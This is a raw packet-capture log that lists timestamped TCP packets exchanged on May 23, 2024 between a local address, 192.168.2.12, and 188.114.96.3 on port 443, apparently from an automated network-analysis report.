                May 23, 2024 18:26:43.814256907 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.816158056 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.816184044 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.816217899 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.816226006 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.816246033 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.816265106 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.818582058 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.818608046 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.818646908 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.818658113 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.818675995 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.818692923 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.820429087 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.820458889 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.820532084 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.820543051 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.820557117 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.820578098 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.902338982 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.902379990 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.902520895 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.902553082 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.902627945 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.902681112 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.902702093 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.902712107 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.902756929 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.902789116 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.905843019 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.905873060 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.905934095 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.905958891 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.905981064 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.906006098 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.906790018 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.906816006 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.906991005 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.907000065 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.907041073 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.908334970 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.908365011 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.908430099 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.908443928 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.908480883 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.914052010 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.914083958 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.914144039 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.914169073 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.914182901 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.914205074 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.915165901 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.915193081 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.915232897 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.915255070 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.915275097 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.915296078 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.916157007 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.916183949 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.916222095 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.916237116 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.916265011 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.916279078 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.994283915 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.994358063 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.994417906 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.994468927 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.994503975 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.994514942 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.995834112 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.995878935 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.995913029 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.995927095 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.995949030 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.995970011 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.006122112 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.006175995 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.006263971 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.006297112 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.006311893 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.006345034 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.006647110 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.006696939 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.006730080 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.006738901 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.006762028 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.006779909 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.006833076 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.006875992 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.006906986 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.006913900 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.006936073 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.006954908 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.008059025 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.008102894 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.008157015 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.008179903 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.008208036 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.008224964 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.009485006 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.009532928 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.009578943 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.009602070 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.009617090 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.009639025 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.010549068 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.010590076 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.010629892 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.010649920 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.010664940 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.010693073 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.082802057 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.082847118 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.082914114 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.082946062 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.082967997 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.083000898 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.084424019 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.084461927 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.084541082 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.084561110 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.084594965 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.084614992 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.086251020 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.086278915 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.086319923 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.086332083 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.086364985 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.086386919 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.088656902 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.088701010 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.088746071 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.088762999 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.088795900 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.088814020 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.090661049 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.090696096 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.090729952 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.090748072 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.090771914 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.090792894 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.097179890 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.097204924 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.097248077 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.097271919 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.097290993 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.097313881 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.100975037 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.101003885 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.101042032 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.101064920 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.101077080 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.101102114 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.101134062 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.147079945 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.173713923 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.173736095 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.173815012 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.173830032 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.173844099 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.173870087 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.175277948 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.175295115 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.175339937 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.175347090 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.175369024 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.175388098 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.177243948 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.177261114 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.177301884 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.177306890 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.177329063 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.177349091 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.179018021 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.179033995 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.179099083 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.179107904 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.179141998 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.181273937 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.181293964 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.181346893 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.181365967 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.181401014 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.189393044 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.189410925 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.189479113 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.189491987 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.189528942 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.191272974 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.191298008 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.191334963 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.191342115 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.191368103 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.191386938 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.193717003 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.193756104 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.193775892 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.193782091 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.193806887 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.193830013 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.265080929 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.265100002 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.265156031 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.265188932 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.265206099 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.265244961 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.266606092 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.266622066 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.266686916 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.266694069 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.266730070 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.268311024 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.268326998 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.268390894 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.268404007 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.268446922 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.270168066 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.270184040 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.270242929 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.270262957 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.270301104 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.272557974 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.272587061 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.272635937 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.272650957 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.272661924 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.272686005 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.280898094 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.280921936 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.280960083 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.280973911 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.280997992 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.281017065 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.281984091 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.282007933 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.282049894 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.282058001 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.282073975 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.282092094 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.283816099 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.283838034 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.283871889 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.283878088 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.283900976 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.283932924 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.357702971 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.357731104 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.357981920 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.358030081 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.358083010 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.359256029 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.359275103 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.359333992 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.359353065 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.359395981 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.360824108 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.360842943 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.360909939 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.360930920 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.360997915 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.363071918 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.363090992 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.363147974 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.363168955 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.363213062 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.365744114 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.365762949 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.365875006 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.365895987 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.365931988 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.373090029 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.373109102 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.373189926 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.373215914 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.373259068 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.378551960 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.378572941 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.378632069 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.378652096 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.378690004 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.379436016 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.379455090 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.379508018 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.379522085 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.379559994 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.475001097 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.475037098 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.475189924 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.475231886 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.475275040 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.575278997 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.575331926 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.575483084 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.575511932 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.575557947 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.645520926 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.645545959 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.645705938 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.645730972 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.645807028 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.710774899 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.710803986 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.710932970 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.710966110 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.711045980 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.760456085 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.760487080 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.760715008 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.760726929 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.760775089 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.803925991 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.803985119 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.804040909 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.804071903 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.804088116 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.804112911 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.840928078 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.840958118 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.841061115 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.841084957 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.841095924 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.841125011 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.872370958 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.872397900 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.872447968 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.872457981 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.872477055 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.872503996 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.898421049 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.898447037 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.898598909 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.898622990 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.898674011 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.920934916 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.920960903 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.921123028 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.921155930 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.921204090 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.942699909 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.942728043 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.942857027 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.942874908 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.942925930 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.965056896 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.965081930 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.965173960 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.965213060 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.965267897 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.986501932 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.986560106 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.986773968 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:44.986813068 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:44.986876965 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:45.004838943 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:45.004868031 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:45.004970074 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:45.004997969 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:45.005039930 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:45.023910999 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:45.023938894 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:45.024056911 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:45.024092913 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:45.024136066 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:45.041070938 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:45.041093111 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:45.041183949 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:45.041223049 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:45.041277885 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:45.057792902 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:45.057816982 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:45.057905912 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:45.057934999 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:45.057980061 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:45.064177990 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:45.064277887 CEST49721443192.168.2.12188.114.96.3
